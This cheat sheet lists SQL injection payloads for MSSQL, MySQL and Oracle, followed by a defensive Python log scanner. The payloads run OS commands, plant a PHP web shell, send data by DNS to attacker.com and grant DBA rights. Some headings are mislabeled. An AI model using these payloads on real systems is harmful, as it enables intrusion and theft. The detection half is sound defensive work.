⁉️ Techniques to Force Errors from Databases for SQL Injection

Below are some advanced and rare SQL injection techniques for MSSQL, MySQL, and Oracle. These techniques go beyond the basic ones and exploit specific features and configurations of the databases.
MSSQL
OLE Automation Procedures
DECLARE @Object INT;
EXEC sp_OACreate 'WScript.Shell', @Object OUTPUT;
EXEC sp_OAMethod @Object, 'Run', NULL, 'cmd.exe /c whoami > C:\output.txt';
This uses OLE Automation procedures to execute system commands.
xp_cmdshell with Privilege Escalation
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
EXEC xp_cmdshell 'whoami';
This enables xp_cmdshell to execute system commands if it's not already enabled.
Linked Servers
EXEC sp_addlinkedserver 'attacker_server';
EXEC sp_addlinkedsrvlogin 'attacker_server', 'false', NULL, 'username', 'password';
EXEC ('xp_cmdshell ''net user''') AT attacker_server;
This technique uses linked servers to run commands on a different server.
MySQL
UDF (User Defined Functions) for Remote Command Execution
CREATE TABLE foo (line BLOB);
INSERT INTO foo VALUES (LOAD_FILE('/usr/lib/lib_mysqludf_sys.so'));
SELECT * FROM foo INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('id > /tmp/out; chown mysql.mysql /tmp/out');
This technique involves creating a UDF to execute system commands.
DNS Exfiltration
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT table_name FROM information_schema.tables LIMIT 0,1), '.attacker.com\\a'));
This exfiltrates data through DNS requests to an attacker-controlled domain.
Binary Log Injections
SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/lib/mysql/mysql.log';
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
This exploits the binary log feature to write a web shell.
Oracle
Java Procedures for Command Execution
EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute');
EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
EXEC dbms_java.grant_permission('SCOTT', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "cmd" AS
import java.io.*;
public class cmd {
    public static String run(String cmd) {
        try {
            StringBuffer output = new StringBuffer();
            Process p = Runtime.getRuntime().exec(cmd);
            BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
            String line = "";
            while ((line = reader.readLine()) != null) {
                output.append(line + "\n");
            }
            return output.toString();
        } catch (Exception e) {
            return e.toString();
        }
    }
};
/
CREATE OR REPLACE FUNCTION run_cmd (p_cmd IN VARCHAR2) RETURN VARCHAR2
AS LANGUAGE JAVA
NAME 'cmd.run(java.lang.String) return java.lang.String';
/
SELECT run_cmd('id') FROM dual;
This uses Java stored procedures to execute system commands.
UTL_FILE Package for File Access
DECLARE
    l_file UTL_FILE.FILE_TYPE;
    l_text VARCHAR2(32767);
BEGIN
    -- DIRECTORY_NAME must be an existing Oracle DIRECTORY object the user may write to
    l_file := UTL_FILE.FOPEN('DIRECTORY_NAME', 'output.txt', 'W');
    UTL_FILE.PUT_LINE(l_file, 'Data from UTL_FILE');
    UTL_FILE.FCLOSE(l_file);
END;
This technique uses the UTL_FILE package to write files to the server.
DBMS_SCHEDULER for Job Execution
BEGIN
    DBMS_SCHEDULER.create_job(
        job_name        => 'job1',
        job_type        => 'PLSQL_BLOCK',
        job_action      => 'BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO SCOTT''; END;',
        start_date      => SYSTIMESTAMP,
        repeat_interval => NULL,
        end_date        => NULL,
        enabled         => TRUE
    );
END;
This uses DBMS_SCHEDULER to execute jobs that can change database permissions.
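From the defender's side, every technique above leaves a distinctive statement in the database's query or audit log. The following is an added example, not part of the original page: a small Python scanner that flags log entries matching the MSSQL, MySQL and Oracle primitives catalogued above. The log format ("<timestamp> <db_user> <statement>" per line) and the sample entries are constructed for this example.

```python
# Added example (not from the original page): flag statement-log entries that
# match the post-exploitation primitives listed above. Log format is assumed:
# "<timestamp> <db_user> <statement>" on each line, one statement per line.
import re

# (rule_name, pattern); case-insensitive, tolerant of extra whitespace.
RULES = [
    ("mssql_ole_automation", r"\bsp_OA(?:Create|Method|GetProperty|SetProperty)\b"),
    ("mssql_xp_cmdshell", r"\bxp_cmdshell\b"),
    ("mssql_reconfigure_dangerous_option",
     r"sp_configure\s+'(?:show advanced options|xp_cmdshell|Ole Automation Procedures)'"),
    ("mssql_linked_server", r"\bsp_addlinked(?:server|srvlogin)\b"),
    ("mysql_udf_install", r"INTO\s+DUMPFILE|CREATE\s+FUNCTION\s+\w+\s+RETURNS\s+\w+\s+SONAME"),
    ("mysql_unc_load_file", r"LOAD_FILE\s*\(.*\\\\"),          # UNC path => DNS/SMB egress
    ("mysql_log_redirect", r"SET\s+GLOBAL\s+general_log(?:_file)?\b"),
    ("mysql_outfile_write", r"INTO\s+OUTFILE"),
    ("oracle_java_permission", r"dbms_java\.grant_permission|LANGUAGE\s+JAVA"),
    ("oracle_utl_file_write", r"UTL_FILE\.FOPEN\s*\([^)]*'W'"),
    ("oracle_scheduler_grant", r"DBMS_SCHEDULER\.create_job|GRANT\s+DBA\b"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]

# Constructed sample log: two benign statements mixed with entries shaped like the
# xp_cmdshell, LOAD_FILE-over-UNC, DUMPFILE and DBMS_SCHEDULER snippets above.
SAMPLE_LOG = r"""2024-05-01T10:00:01Z app_ro SELECT id, name FROM customers WHERE id = 42
2024-05-01T10:00:02Z app_ro EXEC sp_configure 'xp_cmdshell', 1
2024-05-01T10:00:03Z app_ro EXEC xp_cmdshell 'whoami'
2024-05-01T10:00:04Z app_ro SELECT LOAD_FILE(CONCAT('\\\\', (SELECT table_name FROM information_schema.tables LIMIT 0,1), '.example.invalid\\a'))
2024-05-01T10:00:05Z app_ro SELECT * FROM foo INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so'
2024-05-01T10:00:06Z scott BEGIN DBMS_SCHEDULER.create_job(job_name => 'job1', job_type => 'PLSQL_BLOCK', job_action => 'BEGIN EXECUTE IMMEDIATE ''GRANT DBA TO SCOTT''; END;', enabled => TRUE); END;
2024-05-01T10:00:07Z app_ro UPDATE customers SET last_login = NOW() WHERE id = 42
"""


def scan_log(text):
    """Return [(line_no, db_user, rule_name), ...] for every rule that fires on a line."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue  # malformed line; a stricter policy would alert on these too
        _ts, user, stmt = parts
        for name, pattern in COMPILED:
            if pattern.search(stmt):
                hits.append((line_no, user, name))
    return hits


def rules_by_user(hits):
    """Group fired rule names per database user, which is what triage starts from."""
    summary = {}
    for _line_no, user, name in hits:
        summary.setdefault(user, set()).add(name)
    return summary
```

An application service account such as app_ro should never issue any of these statements, so a single hit from it is worth an alert rather than a threshold.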